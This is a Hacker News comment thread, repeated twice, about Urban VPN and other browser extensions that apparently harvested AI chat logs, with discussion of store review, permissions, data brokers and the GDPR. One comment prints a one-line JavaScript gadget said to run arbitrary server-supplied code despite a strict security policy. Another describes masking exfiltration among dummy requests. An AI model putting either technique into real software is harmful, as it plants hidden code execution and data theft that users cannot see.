I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.
> Firefox is committed to helping protect you against third-party software that may inadvertently compromise your data – or worse – breach your privacy with malicious intent. Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.
Yeah IT pros and tech aware "power" users can always take these measures but the very availability of poor or maliciously coded extensions and apps in popular app stores makes it a problem considering normies will get swayed by the swanky features the software promises and will click past all misgivings and warnings. Social engineering attacks are impossible to prevent using technical means alone. Either a critical mass of ordinary people need to become more safety/privacy conscious or general purpose computing devices will become more & more niche as the very industry which creates these problems in the first place by poor review will also sell the solution of universal thin-clients and locked down devices, of course with the very happy cooperation of govts everywhere.
> I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.
If you're feeling extra-paranoid, the XPI file can be unpacked (ZIP) and to check over the code for anything suspicious or unreasonably-complex, particularly if the browser-extension is supposed to be something simple like "move the up/down vote arrows further apart on HN". :P
While that doesn't solve the overall ecosystem issue, every little bit helps. You'll know it's time to run away if extensions become closed-source blobs.
The problem is most codebase are huge - millions of lines when you include all the libraries etc.
Often they're compiled with typescript etc making manual review almost impossible.
And if you demand the developer send in the raw uncompiled stuff you have the difficulty of Google/Mozilla having to figure out how to compile an arbitrary project which could use custom compilers or compilation steps.
Remember that someone malicious wont hide their malicious code in main.ts... it's gonna be deep inside a chain of libraries (which they might control too, or might have vendored).
For example, the following hidden anywhere in the codebase allows arbitrary code execution even under the most stringent JavaScript security policy (no eval etc):
The actual code to run can be delivered as an innocuous looking JavaScript array from some server, and potentially only delivered to one high value target.
Probably off topic: I once tried to find bad code in a WordPress theme. And it was hidden so deep and inconspicuously. The only thing that really helped was to do a diff.
In JS this can be much harder to find anything suspicious when the code can be minified.
But back to Firefox: My house, my rules. So let external developers set some more strict rules that discourage the bad actors a little.
The question is, does Mozilla rigorously review every single update of every featured extension? Or did they just vet it once, and a malicious developer may now introduce data collection or similar "features" though a minor update of the extension and keep enjoying the "recommended" badge by Mozilla?
This may also be the reason for the extension begin "Featured" on the Chrome Web Store: Google vetted it once, and didn't think about it for each update.
Funny enough the article mentions this extension was manially reviewed:
> A "Featured" badge from Google, meaning it had passed manual review and met what Google describes as "a high standard of user experience and design."
What I saw in Mozilla extensions store was anything from using minified code (what is this? it might have been useful in the late 90's on the web, but it surely is not necessary as part of an extension, that doesn't download its code from anywhere), to just full on data stealing code (reported, and mozilla removed it after 2 weeks or so).
I don't trust the review process one bit if they allow minified code in the store. For the same reason, "manual" review doesn't fill me with any extra warm confidence feeling. I can look at minified code manually myself, but it's just gibberish, and suspicious code is much harder to discern.
Also, I just stopped using third party extensions, except for 2 (violentmonkey, ublock), so I no longer do reviews. I had a script that would extract the XPI into a git repository before update, do a commit and show me a diff.
Friendly extension store for security conscious users would make it easy to review source code of the extension before hitting install or update. This is like the most security sensitive code that exists in the browser.
> I know that Google hates to pay human beings, but this is an area that needs human eyes on code, not automated scans.
I think we need both human review and for somebody to create an antivirus engine for code that's on par with the heuristics of good AV programs.
You could probably do even better than that since you could actually execute the code, whole or piecewise, with debugging, tracing, coverage testing, fuzzing and so on.
They look really legitimate on the outside, to the point that there's a fair chance they're not aware what their extension is doing. Possibly they're "victim" of this as well.
If that looks use-italics "really legitimate" to you, then you might be easily scammed. I'm not saying they're not legitimate, but nothing that you shared is a strong signal of legitimacy.
It would take a perhaps a few hundred dollars a month to maintain a business that looked exactly like this, and maybe a couple thousand to buy one that somebody else had aged ahead of time. You wouldn't have to have any actual operations. Just continuously filed corporate papers, a simple brochure website, and a couple virtual office accounts in places so dense that people don't know the virtual address sites by heart.
Old advice, but be careful believing what you encounter on the internet!
> Urban VPN is operated by Urban Cyber Security Inc., which is affiliated with BiScience (B.I Science (2009) Ltd.), a data broker company.
> This company has been on researchers' radar before. Security researchers Wladimir Palant and John Tuckner at Secure Annex have previously documented BiScience's data collection practices. Their research established that:
> BiScience collects clickstream data (browsing history) from millions of users
Data is tied to persistent device identifiers, enabling re-identification
The company provides an SDK to third-party extension developers to collect and sell user data
> BiScience sells this data through products like AdClarity and Clickstream OS
> The identical AI harvesting functionality appears in seven other extensions from the same publisher, across both Chrome and Edge:
Hmm.
> They look really legitimate on the outside
Hmm, what, no.
We have a data collection company, thriving financially on lack of privacy protections, indiscriminant collection and collating of data, connected to eight data siphoning "Violate Privacy Network" apps.
And those apps are free... Which is seriously default sketchy if you can't otherwise identify some obviously noble incentives to offer free services/candy to strangers.
Once is happenstance, twice is coincidence, three (or eight) times is enemy action.
The only thing that could possibly make this look any worse is discovering a connection to Facebook.
Judging from their website, all links eventually point to either the VPN extension download website, or a signup link. I'm not surprised if some nation state supported APT is behind this shit.
I am surprised because google review team rejects half of my extensions and apps.
Sometimes things don't make sense to me, like how "Uber Driver app access background location and there is no way to change that from settings" - https://developer.apple.com/forums/thread/783227
If Google would care at all for their users, they'd tell WhatsApp to not require the use of the Contacts permission only to add names to numbers when you don't share the Contacts with the App.
Or they'd tell WhatsApp to allow granting microphone permissions for one single call, instead of requesting permanent microphone permissions. All apps that I know of respect the flow of "Ask every time", all but Meta's app.
That's all opinionated, and the latter is part of the OS, not WhatsApp. Not liking how an app works does not compare to an app exfiltrating data without your consent.
I wish there was another button on those contact permission boxes which would tell the app you've granted permissions. But when they try to read your contacts, send them randomly generated junk. Fake phone numbers. Fake names.
Or even better, mix in some real names and phone numbers but change all the other details. I want data brokers to think I live in 8 different countries. I want my email address to show up for 50 different identities. Good luck sorting that out.
I think what's going on there is that "While using" includes when a navigation app is running in the background, which is visible to the user (via e.g. a blue status bar pill). "Always" allows access even when it's not clear to the user that an app is running.
This might be a case of app permissions just being poorly delineated. E.g. I've seen Android apps require "location data" access just because they want to connect over bluetooth or manage WiFi or something (not entirely sure which one it was specifically) because that is actually the same permission and the wording in the permission modal is misleading.
The permissions model for browser extensions has always been backwards. You grant full access at install time, then cross your fingers that nothing changes in an update.
What we actually need is runtime permissions that fire when the extension tries to do something suspicious - like exfiltrating data to domains that aren't related to its stated function. iOS does this reasonably well for apps. Extensions should too.
The "Recommended" badge helps but it's a bandaid. If an extension needs "read and change all data on all websites" to work, maybe it shouldn't work.
A big problem is also that you can pretty much only grant permission for one specific site or all sites and this very much depends on which of those two options the extension uses.
For example there's no need for the "inject custom JS or CSS into websites" extensions to need permission to read and write data on every single website you visit. If you only want to use them to make a few specific sites more accessible to you that doesn't mean you're okay with them touching your online banking. Especially when most of these already let you define specific URLs or patterns each rule/script should apply to.
I understand that there are still vectors for data exfiltration when the same extension has permissions on two different sites and that "code injection as a service" is inherently risky (although cross-origin policies can already lock this down somewhat) but in 2025 I'd hope we could have a more granular permission model for browser extensions that actually supports sandboxing.
Yes, but its incredibly dangerous when the operator of the token predictor can give you, personally, different behavior and can influence your decisions even more directly than before.
Some people are incapable of internal thought. They have to verbalise/write down their thoughts, so they can hear/read it back, and that's how they make progress. In a way, these people's brain do work like LLMs.
It does strike me as pretty crazy, but I'm at the other end of the spectrum, I almost never think about using an AI for anything. I've tried Claude I think, twice (it wasn't very helpful). The only other AI I've ever used are the "AI summaries" that Duck Duck Go sometimes shows at the top of its search results.
I constantly use AI like this. For life decisions, for complicated logistics situations, for technical decisions and architectures, etc. I'm not having it make any decisions for me, I'm just talking through things with another entity who has a vast breadth of knowledge, and will almost always suggest a different angle or approach that I hadn't considered.
Here's an example of the kinds of things I've talked with ChatGPT about in the last few weeks:
- I'm moving to a new area and I share custody of my daughter, so this adds a lot of complications around logistics. Talked through all that.
- Had it research niche podcasts and youtube channels for advertising / sponsorship opportunities for my SaaS
- Talked through a really complex architecture decision that's a mix of technical info and big tradeoffs for cost and customer experience.
- Did some research and talked through options for buying two new vehicles for the upcoming move, and what kinds work best for use cases (which are complex)
- Lots and lots of discussions around complex tax planning for 2026 and beyond
Again, these models have vast knowledge, as well as access to search and other tools to gather up-to-date info and sift through it far faster than I can. Why wouldn't I talk through these things with them? In my experience, with a little guardrails ("double check this" or "search and verify that X..."), I'm finding it more trustworthy than most experts in those fields. For example, I've gotten all kinds of incorrect tax advice from CPAs. Sometimes ChatGPT is out of date, but it's generally pretty accurate around taxes ime, especially if I have it search to verify things.
A certain type of person loves nothing more than to spill their guts to anyone who will listen. They don’t see their conversational partners as other equally aware entities—they are just a sounding board for whatever is in this person's head. So LLMs are incredibly appealing to these folks. LLMs never get tired or zone out or make snarky responses. Add in chatbots’ obsequious enabling, and these folks are instantly hooked.
As someone who has witnessed BiScience tracking in the past, I am not surprised to to hear that they might be involved in all this. They came up in the past when researchers investigated the cyberhaven compromise [1][2]. Though the correlation might not all be there its kind of disappointing
ISPs are so heavily regulated that the will give any federal or government agency free access to future and past internet connection information that are directly tied to your real identity.
Meanwhile reputable VPN provider like mullvad offer there service without KYC and leave feds empty handed when they knock on there doors.
For the same reason you trust your ISP? It handles all your internet traffic; and depending on where you live, probably has government-mandated back doors, or is willing to cooperate with arbitrary requests from law-enforcement agencies.
That's why TLS exists, after all. All Internet traffic is wiretapped.
> I don't understand why so many people are using [Cloudflare].
> "Let us handle all your internet traffic.. you can trust us.. []"
TLS does not help, when most Internet traffic is passed through a single entity, which by default will use an edge TLS certificate and re-encrypt all data passing through, so will have decrypted plain text visibility to all data transmitted.
The use case is people that are urged to view something that is blocked (torrent / adult / gambling). They want it now, and they don't want to get involved with some shady company that slaps on a 2 year contract and keeps extending indefinitely. These people instead find "free vpn" in the web store and decide to give it a try.
VPNs are just one example. How many chrome extensions do you have that you don't use all the time, like adblockers, cookie consent form handlers or dark mode?
Google needs to act on removing these extensions/doing more thorough code reviews. Reputability is everything, and they can be actually valuable (e.g. LastPass, my own extension Ward)
There has to be a better system. Maybe a public extension safety directory?
I don't understand how code review would catch this. The extension advertises itself as an AI protection tool, that monitors your AI interactions. The code is basically consistent with the stated purpose. That it doesn't stop collecting data when you turn of the UI alerting is perhaps an inconsistency, but I think that's debatable (is there a rule in google's terms that says data collection is contingent on UI alerts being enabled?). I'm curious what workflow or decision tree you'd expect a code review process to follow here that results in this being rejected? The problem here doesn't seem like code related, it's policy related, as in, what are they doing with the information, not that the extension has code to collect it.
I’m not sure there’s much more juice to squeeze here via automated or semi-automated means. They could perhaps be doing these kind of human-in-the-loop reviews themselves for all extensions that hit a certain install count, but that’s not a popular technique at Google.
Chrome extension codebases are fairly basic, I think there's room to build an agentic code scanner for these, but the juice probably isn't worth the squeeze to justify for them $$$-wise. Manual reviews I agree are expensive and dicey.
adblockers on chromium-based browsers were severely crippled by manifest V3. they're fine with extenisons (and apparently malware) as long as users can't effectively block their tracking/ads.
You're not wrong, but one thing about scammy developers is they tend to be ballsy and not covert. The Koi blog covers all the egregious code specifically for exfilling LLM conversations. This stuff is a walking red flag if it was in a public commit/PR.
Its the reason why they found it because the code was in extension. Before manifest v3, extensions could just load external scripts and there's no way you could tell what they were actually doing.
I'm glad the extension system isn't broken (e.g. extensions being hacked). This is just scammy extensions to begin with. I've been scared of extensions since they were first offered (I did like useing greasemonkey to customize everything back in the 2000's/2010's), but I can't resist privacy badger and Ublock Origin since they are open source (but even then it's still a risk).
What is the economic value of all these AI chat logs? I can see it useful for developing advertising profile. But I wonder if it's also just sold as training data for people try to build their own models?
Pretty easy to match up those logs with browser fingerprinting to identify the actual user. Then you have "do you want to purchase what Mr. Foo Bar is prompting the LLM?"
So much of what's aimed at nontechnical consumers these days is full of dishonesty and abuse. Microsoft kinda turned Windows into something like this, you need OneDrive "for your protection", new telemetry and ads with every update, etc.
In much of the physical world thankfully there's laws and pretty-effective enforcement against people clubbing you on the head and taking your stuff, retail stores selling fake products and empty boxes, etc.
But the tech world is this ever-boiling global cauldron of intangible software processes and code - hard to get a handle on what to even regulate. Wish people would just be decent to each other, and that that would be culturally valued over materialism and moneymaking by any possible means. Perhaps it'll make a comeback.
This was a nearly poetic way to put it. Thank you for ascribing words to a problem that equally frustrates me.
I spend a lot of time trying to think of concrete ways to improve the situation, and would love to hear people's ideas. Instinctively I tend to agree it largely comes down to treating your users like human beings.
The situation won’t be improved for as long as an incentive structure exists that drives the degradation of the user experience.
Get as off-grid as you possibly can. Try to make your everyday use of technology as deterministic as possible. The free market punishes anyone who “respects their users”. Your best bet is some type of tech co-op funded partially by a billionaire who decided to be nice one day.
And still, there is plenty of software that you can't run on anything but Windows. That's a major blocker at this point and projects like 'mono' and 'wine', while extremely impressive, are still not good enough to run that same software on Linux.
I wouldn't be surprised if this was done by one of those AI companies themselves!
Remember FaceBook x Onavo?
"Facebook used a Virtual Private Network (VPN) application it acquired, called Onavo Protect, as a surveillance tool to monitor user activity on competing apps and websites"
This is exactly why we need more transparency in analytics tools. When building products that handle user data, the "free" model almost always means you're the product.
The scary part is these extensions had Google's "Featured" badge. Manual review clearly isn't enough when companies can update code post-approval. We need continuous monitoring, not just one-time vetting.
For anyone building privacy-focused tools: making your data collection transparent and your business model clear upfront is the only way to build trust. Users are getting savvier about this.
I'm not a spy so I don't know, but surely in most scenarios it's a lot easier to just ask someone for some data than it is hack/steal it. 25 years of social media has shown that people really don't care about what they do with their data.
Huh? Of course they would: It's way less work than defeating TLS/SSL encryption or hacking into a bunch of different servers.
Bonus points if the government agency can leave most of the work to an ostensibly separate private company, while maintaining a "mutual understanding" of government favors for access.
Why wouldn't they? It isn't that you need to, just that obviously you would. You engage with the extension owners by sending an email from a director of a data company instead of as a captain of some military operation. The hit rate is going to be much higher with one of the strategies.
It would have been no less suprising to me had it been a US company but it certainly fits the cultural stereotype of callousness that particular country has been openly displaying in recent years.
Some people have mentioned that this is a U.S incorporated company (Delaware). Recommend reading Moneyland by Oliver Bullough if you want to know more about the U.S role as the new shell company haven.
Somewhat ironically, this article has significant amounts of AI writing in it. (I've done a lot of AI writing in my own sites, and have been learning how to smother "the voice". This article doesn't do a good job of smothering.)
I think this is most likely what happened. The update/review process for extensions is broken. Apparently you can add any malicious functionality after you’re in and also keep any badges and recommendations.
Why would one expect privacy with a vpn? That too a free one? With the web all traffic is encrypted point to point, which means individual sites could compromise your privacy but there is no single funnel to lose all your data. VPN is exactly that! All data goes through a single funnel and they can target anything they want
Thanks, the last fetched page on archive.org is from 2025-01-26 [1], removed after this date and before 2025-02-13. 155,477 users at the moment, 1 star reviews were mostly about not working. It's interesting that the developers didn't care to remove the button directing to the ff add-on page at least several months after the removal. Maybe was some kind of PR compromise, they probably thought that listing it with linking to a broken page was better than not listing at all.
A review page [2] mentions that this add-on is a peer-to-peer vpn, not having its own dedicated servers that already makes it suspicious.
> Probably not. All side effects need to go through the js side. So you can alway see where http calls are made
That can be circumnavigated by bundling the conversations into one POST to an API endpoint, along with a few hundred calls to several dummy endpoints to muddy the waters. Bonus points if you can make it look like an normal-passing update script.
It'll still show up in the end, but at this point your main goal is to delay the discovery as much as you can.
This is a huge trust failure. A VPN or ad blocker quietly harvesting full AI conversations is the opposite of what users expect, and the fact that these extensions were featured makes it even worse. This really puts the effectiveness of browser extension reviews into question.
Why is a security researcher using a Free VPN? The standard wisdom is "if its free, you're the product". So you're going to proxy all your sensitive traffic through a free thing? Its not great to trust paid services with your data, nevermind free stuff.
Sometimes knowing tech makes us think we're somehow better and can bypass high level wisdom.
They are not. They found it by searching for extensions that had the capability to exfiltrate data.
> We asked Wings, our agentic-AI risk engine, to scan for browser extensions with the capability to read and exfiltrate conversations from AI chat platforms.
Let's say we don't trust ublock. At the very least it is still blocking ad networks which do reduce internet performance and are vectors of exploitation, so it is still adding value whether you trust it or not.
Nice write up. It would be great if the authors could follow up with a detailed technical walk through of how to use the various tooling to figure out what an extension is really doing.
Could one just feed the extension and a good prompt to claude to do this? Seems like automation CAN sniff this kind of stuff out pretty easily.
Why these browser extensions cannot live in a guarded sandbox? Extensions are given full access to whatever is available on any page. I had legacy React developer tools and Redux DevTools installed for years. What a great attack vector.
Note that in the profile of a model in Openrouter, under Data Policy, there is a statement as "Prompt Training". Some of model will clearly stated that prompt training is true, even for paid models.
Do we know for how much that type of content sells? Not that I'm interested in entering the market, but the economics of that kind of thing are always fascinating. How much are buyers willing to pay for AI conversations? I would expect the value to be pretty low
I doubt its the actual conversations but the aggregated insights that are valuable.
Think: is my brand getting mentioned more in AI chats? Are people associating positive or negative feelings towards it? Are more people asking about this topic lately?
Let's assume that people are discussing medical conditions in these conversations - I think that insurance companies would be pretty interested to get this kind of data in their hands.
What would the fallout look like if too many people start to have horror stories about how much their life is destroyed by incriminating or down right nasty or wrong ai chat history. It'll suddenly become a tool where you can't be honest. If it's not already.
> A "Featured" badge from Google, meaning it had passed manual review and met what Google describes as "a high standard of user experience and design."
Trusting Google with your privacy is like putting the fox in charge of the henhouse.
The only extensions I have installed are dark reader and ublock origin. Would be nice if I could disable auto updating for them somehow and run local pinned versions...
From my experience, Google does not do a thorough app review. Reviewers get maybe a few minutes to review and move on due to the volume of apps awaiting review.
Can we please, please stop using this absolutely deprecated proverb? As shown in YouTube lite, Samsung fridges with ads, cars with telemetry etc. etc. even if you paid, you are still subject to manipulation, spyware, ads and telemetry. It has absolutely nothing to do with payment.
I hate to be that guy, but I am having a difficult time verifying any of this. How likely is it that this is entirely hallucinated? Can anyone independently verify this?
Pro tip - never install any browser extensions. Avoid like a plague. I had a couple installed that were “legitimate” and I have direct evidence of them leaking/selling my browsing data. Just avoid.
Note that this is a pretty blatant GDPR violation and you should report this to the local data protection agency if you are a EU resident and care about this (especially if you've used this extension). Their privacy policy claims the data collection is consent-based and that the app settings also let you revoke this consent. According to the article, the latter isn't the case and the user is never informed of the extent of the collection and the risk of sensitive or specially protected personal information (e.g. sexual orientation) being part of the data they're collecting. Their privacy policy states the collected data is filtered to remove this kind of information but that's irrelevant because processing necessarily happens after collection and the GDPR already applies at the start of that pipeline.
If Urban VPN is indeed closely affiliated with the data broker, a GDPR fine might also affect that company too given how these fines work. There is a high bar for the kind of misconduct that would result in a fine but it seems plausible that they're being knowingly and deliberately deceptive and engaging in widespread data collection that is intentionally invasive and covert. That would be a textbook example for the kind of behavior the GDPR is meant to target with fines.
The same likely applies to the other extensions mentioned in the article. Yes, "if the product is free, you are the product" but that is exactly why the GDPR exists. The problem isn't that they're harvesting user data but that they're being intentionally deceptive and misleading in their statements about this, claim they are using consent as the legal basis without having obtained it[0], and they're explicitly contradicting themselves in their claims ("we're not collecting sensitive information that would need special consideration but if we do we make sure to find it and remove it before sharing your information but don't worry because it's mostly used in aggregate except when it isn't"). Just because you except some bruising when picking up martial arts as a hobby doesn't mean your sparring partner gets to pummel your face in when you're already knocked out.
[0]: Because "consent" seems to be a hard concept for some people to grasp: it's literally analogous to what you'd want to establish before having sex with someone (though to be fair: the laws are much more lenient about unclear consent for sex because it's less reasonable to expect it to be documented with a paper trail like you can easily do for software). I'll try to keep it SFW but my place of work is not your place of work so think carefully if you want to copy this into your next Powerpoint presentation.
Does your prospective sexual partner have any reason to strongly believe that they can't refuse your advances because doing so would limit their access to something else (e.g. you took them on a date in your car and they can't afford a taxi/uber and public transport isn't available so they rely on you to get back home, aka "the implication")? Then they can't give you voluntary consent because you're (intentionally or not) pressuring them into it. The same goes if you make it much harder for them to refuse than to agree (I can't think of a sex analogy for this because this seems obvious in direct human interactions but somehow some people still think hiding "reject all non-essential" is an option you are allowed to hide between two more steps when the "accept all" button is right there even if the law explicitly prohibits these shenanigans).
Is your prospective sexual partner underage or do they appear extremely naive (e.g. you suspect they've never had any sex ed and don't know what having sex might entail or the risks involved like pregnancy, STIs or, depending on the acts, potential injuries)? Then they probably can't give you informed consent because they don't fully understand what they're consenting to. For data processing this would be failure to disclose the nature of the collection/processing/storage that's about to happen. And no, throwing the entire 100 page privacy policy at them with a consent dialog at the start hardly counts the same way throwing a biology textbook at a minor doesn't make them able to consent.
Is your prospective sexual partner giving you mixed signals but seems to be generally okay with the idea of "taking things further"? Then you're still missing specific consent and better take things one step at a time checking in on them if they're still comfortable with the direction you're taking things before you decide to raw dog their butt (even if they might turn out to be into that). Or in software terms, it's probably better to limit the things you seek consent for to what's currently happening for the user (e.g. a checkbox on a contact form that informs them what you actually intend to do with that data specifically) rather than try to get it all in one big consent modal at the start - this also comes with the advantage that you can directly demonstrate when and how the specific consent relevant to that data was obtained when later having to justify how that data was used in case something goes wrong.
Is your now-active sexual partner in a position where they can no longer tell you to stop (e.g. because they're tied up and ball-gagged)? Then the consent you did obtain isn't revokable (and thus again invalid) because they need to be able to opt out (this is what "safe words" are for and why your dentist tells you to raise your hand where they can see it if you need them to stop during a procedure - given that it's hard to talk with someone's hands in your mouth). In software this means withdrawing consent (or "opting out") should be as easy as it was to give it in the first place - an easy solution is having a "privacy settings" screen easily accessible in the same place as the privacy policy and other mandatory information that at the very least covers everything you stuffed in that consent dialog I told you not to use, as well as anything you tucked away in other forms downstream. This also gives you a nice place to link to at every opportunity to keep your user at ease and relaxed to make the journey more enjoyable for both of you.
They're probably only incorporated in the US, so it's meaningless. If they plan to establish a corp in the EU they'll just put it in Ireland and bribe Ireland like all of US big tech does. This is a solved thing.
What sort of argument is that? Just because I need to eat (also let's be real the developers/owners behind this app are not struggling to get food on the table), does excuse me doing unethical/illegal things (and this behaviour is almost certainly illegal in the EU at least).
The guy that holds up people for money in the alley is a human too, people forget, and needs to pay for food and a place to live. Of course they do too.
I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.
> Firefox is committed to helping protect you against third-party software that may inadvertently compromise your data – or worse – breach your privacy with malicious intent. Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.
https://support.mozilla.org/en-US/kb/recommended-extensions-...
I know that Google hates to pay human beings, but this is an area that needs human eyes on code, not just automated scans.
Yeah IT pros and tech aware "power" users can always take these measures but the very availability of poor or maliciously coded extensions and apps in popular app stores makes it a problem considering normies will get swayed by the swanky features the software promises and will click past all misgivings and warnings. Social engineering attacks are impossible to prevent using technical means alone. Either a critical mass of ordinary people need to become more safety/privacy conscious or general purpose computing devices will become more & more niche as the very industry which creates these problems in the first place by poor review will also sell the solution of universal thin-clients and locked down devices, of course with the very happy cooperation of govts everywhere.
> I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.
If you're feeling extra-paranoid, the XPI file can be unpacked (ZIP) and to check over the code for anything suspicious or unreasonably-complex, particularly if the browser-extension is supposed to be something simple like "move the up/down vote arrows further apart on HN". :P
While that doesn't solve the overall ecosystem issue, every little bit helps. You'll know it's time to run away if extensions become closed-source blobs.
You can also, more conveniently, plug an extension's URL into this viewer:
https://robwu.nl/crxviewer/
1 reply →
The problem is most codebase are huge - millions of lines when you include all the libraries etc.
Often they're compiled with typescript etc making manual review almost impossible.
And if you demand the developer send in the raw uncompiled stuff you have the difficulty of Google/Mozilla having to figure out how to compile an arbitrary project which could use custom compilers or compilation steps.
Remember that someone malicious wont hide their malicious code in main.ts... it's gonna be deep inside a chain of libraries (which they might control too, or might have vendored).
For example, the following hidden anywhere in the codebase allows arbitrary code execution even under the most stringent JavaScript security policy (no eval etc):
I=c=>c.map?c[0]?c.reduce((a,b)=>a[b=I(b)]||a(b),self):c[1]:c
(How it works is an exercise to the reader)
The actual code to run can be delivered as an innocuous looking JavaScript array from some server, and potentially only delivered to one high value target.
6 replies →
Probably off topic: I once tried to find bad code in a WordPress theme. And it was hidden so deep and inconspicuously. The only thing that really helped was to do a diff.
In JS this can be much harder to find anything suspicious when the code can be minified.
But back to Firefox: My house, my rules. So let external developers set some more strict rules that discourage the bad actors a little.
1 reply →
The question is, does Mozilla rigorously review every single update of every featured extension? Or did they just vet it once, and a malicious developer may now introduce data collection or similar "features" though a minor update of the extension and keep enjoying the "recommended" badge by Mozilla?
This may also be the reason for the extension begin "Featured" on the Chrome Web Store: Google vetted it once, and didn't think about it for each update.
> The question is, does Mozilla rigorously review every single update of every featured extension?
Yes.
This is just spreading FUD where an answer could have been provided.
> Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.
https://support.mozilla.org/en-US/kb/recommended-extensions-...
3 replies →
Funny enough the article mentions this extension was manially reviewed: > A "Featured" badge from Google, meaning it had passed manual review and met what Google describes as "a high standard of user experience and design."
I at some point vetted the extensions for myself.
What I saw in Mozilla extensions store was anything from using minified code (what is this? it might have been useful in the late 90's on the web, but it surely is not necessary as part of an extension, that doesn't download its code from anywhere), to just full on data stealing code (reported, and mozilla removed it after 2 weeks or so).
I don't trust the review process one bit if they allow minified code in the store. For the same reason, "manual" review doesn't fill me with any extra warm confidence feeling. I can look at minified code manually myself, but it's just gibberish, and suspicious code is much harder to discern.
Also, I just stopped using third party extensions, except for 2 (violentmonkey, ublock), so I no longer do reviews. I had a script that would extract the XPI into a git repository before update, do a commit and show me a diff.
Friendly extension store for security conscious users would make it easy to review source code of the extension before hitting install or update. This is like the most security sensitive code that exists in the browser.
> I know that Google hates to pay human beings, but this is an area that needs human eyes on code, not automated scans.
I think we need both human review and for somebody to create an antivirus engine for code that's on par with the heuristics of good AV programs.
You could probably do even better than that since you could actually execute the code, whole or piecewise, with debugging, tracing, coverage testing, fuzzing and so on.
The article says the extension has been "manually reviewed" by Google.
...and we all know that Google never does anything "manually", so I'd take that with the appropriate serving of salt.
The article states that Google has done the same for this extension as part of providing its "Featured" badge.
The same applies to code editor extensions!
The company behind this appears to be "real" and incorporated in Delaware.
> Urban Cyber Security INC
https://opencorporates.com/companies/us_de/5136044
https://www.urbancybersec.com/about-us/
I found two addresses:
> 1007 North Orange Street 4th floor Wilmington, DE 19801 US
> 510 5th Ave 3rd floor New York, NY 10036 United States
and even a phone number: +1 917-690-8380
https://www.manhattan-nyc.com/businesses/urban-cyber-securit...
They look really legitimate on the outside, to the point that there's a fair chance they're not aware what their extension is doing. Possibly they're "victim" of this as well.
> They look really legitimate on the outside
If that looks use-italics "really legitimate" to you, then you might be easily scammed. I'm not saying they're not legitimate, but nothing that you shared is a strong signal of legitimacy.
It would take a perhaps a few hundred dollars a month to maintain a business that looked exactly like this, and maybe a couple thousand to buy one that somebody else had aged ahead of time. You wouldn't have to have any actual operations. Just continuously filed corporate papers, a simple brochure website, and a couple virtual office accounts in places so dense that people don't know the virtual address sites by heart.
Old advice, but be careful believing what you encounter on the internet!
[flagged]
7 replies →
https://www.manhattanvirtualoffice.com/
The NY address is a virtual office.
https://themillspace.com/wilmington/
The DE address is a virtual office plus coworking facility.
Wow the virtual office concept is so beyond shady. I wonder if there are any legitimate uses of it?
4 replies →
Amazing.
> Urban VPN is operated by Urban Cyber Security Inc., which is affiliated with BiScience (B.I Science (2009) Ltd.), a data broker company.
> This company has been on researchers' radar before. Security researchers Wladimir Palant and John Tuckner at Secure Annex have previously documented BiScience's data collection practices. Their research established that:
> BiScience collects clickstream data (browsing history) from millions of users Data is tied to persistent device identifiers, enabling re-identification The company provides an SDK to third-party extension developers to collect and sell user data
> BiScience sells this data through products like AdClarity and Clickstream OS
> The identical AI harvesting functionality appears in seven other extensions from the same publisher, across both Chrome and Edge:
Hmm.
> They look really legitimate on the outside
Hmm, what, no.
We have a data collection company, thriving financially on lack of privacy protections, indiscriminant collection and collating of data, connected to eight data siphoning "Violate Privacy Network" apps.
And those apps are free... Which is seriously default sketchy if you can't otherwise identify some obviously noble incentives to offer free services/candy to strangers.
Once is happenstance, twice is coincidence, three (or eight) times is enemy action.
The only thing that could possibly make this look any worse is discovering a connection to Facebook.
Israeli company. No doubt some Mossad front.
You can get a mailing address and phone number for like $15/mo. You can incorporate a US business for only a couple hundred dollars.
Is the agent address real?
1000 N. WEST ST. STE. 1501, WILMINGTON, New Castle, DE, 19801
It almost matches this law firms address but not quite.
https://www.skjlaw.com/contact-us/
Brandywine Building 1000 N. West Street, Suite 1501 Wilmington DE 19801
Being a real business doesn't necessarily mean they can be trusted. Real companies do shady stuff all the time.
This also works in reverse: shady companies do real business. While the reason might be different the end result is the same.
> Urban VPN is operated by Urban Cyber Security Inc., which is affiliated with BiScience (B.I Science (2009) Ltd.), a data broker company.
BiScience is an Israeli company.
Israel is the new Russia, I guess.
Judging from their website, all links eventually point to either the VPN extension download website, or a signup link. I'm not surprised if some nation state supported APT is behind this shit.
I am surprised because google review team rejects half of my extensions and apps.
Sometimes things don't make sense to me, like how "Uber Driver app access background location and there is no way to change that from settings" - https://developer.apple.com/forums/thread/783227
If Google would care at all for their users, they'd tell WhatsApp to not require the use of the Contacts permission only to add names to numbers when you don't share the Contacts with the App.
Or they'd tell WhatsApp to allow granting microphone permissions for one single call, instead of requesting permanent microphone permissions. All apps that I know of respect the flow of "Ask every time", all but Meta's app.
Google just doesn't care.
That's all opinionated, and the latter is part of the OS, not WhatsApp. Not liking how an app works does not compare to an app exfiltrating data without your consent.
2 replies →
I wish there was another button on those contact permission boxes which would tell the app you've granted permissions. But when they try to read your contacts, send them randomly generated junk. Fake phone numbers. Fake names.
Or even better, mix in some real names and phone numbers but change all the other details. I want data brokers to think I live in 8 different countries. I want my email address to show up for 50 different identities. Good luck sorting that out.
I think what's going on there is that "While using" includes when a navigation app is running in the background, which is visible to the user (via e.g. a blue status bar pill). "Always" allows access even when it's not clear to the user that an app is running.
The developer documentation is actually pretty clear about this: https://developer.apple.com/documentation/bundleresources/ch...
This might be a case of app permissions just being poorly delineated. E.g. I've seen Android apps require "location data" access just because they want to connect over bluetooth or manage WiFi or something (not entirely sure which one it was specifically) because that is actually the same permission and the wording in the permission modal is misleading.
They are the same permission because you can guess the user’s location using Bluetooth and WiFi.
The permissions model for browser extensions has always been backwards. You grant full access at install time, then cross your fingers that nothing changes in an update.
What we actually need is runtime permissions that fire when the extension tries to do something suspicious - like exfiltrating data to domains that aren't related to its stated function. iOS does this reasonably well for apps. Extensions should too.
The "Recommended" badge helps but it's a bandaid. If an extension needs "read and change all data on all websites" to work, maybe it shouldn't work.
A big problem is also that you can pretty much only grant permission for one specific site or all sites and this very much depends on which of those two options the extension uses.
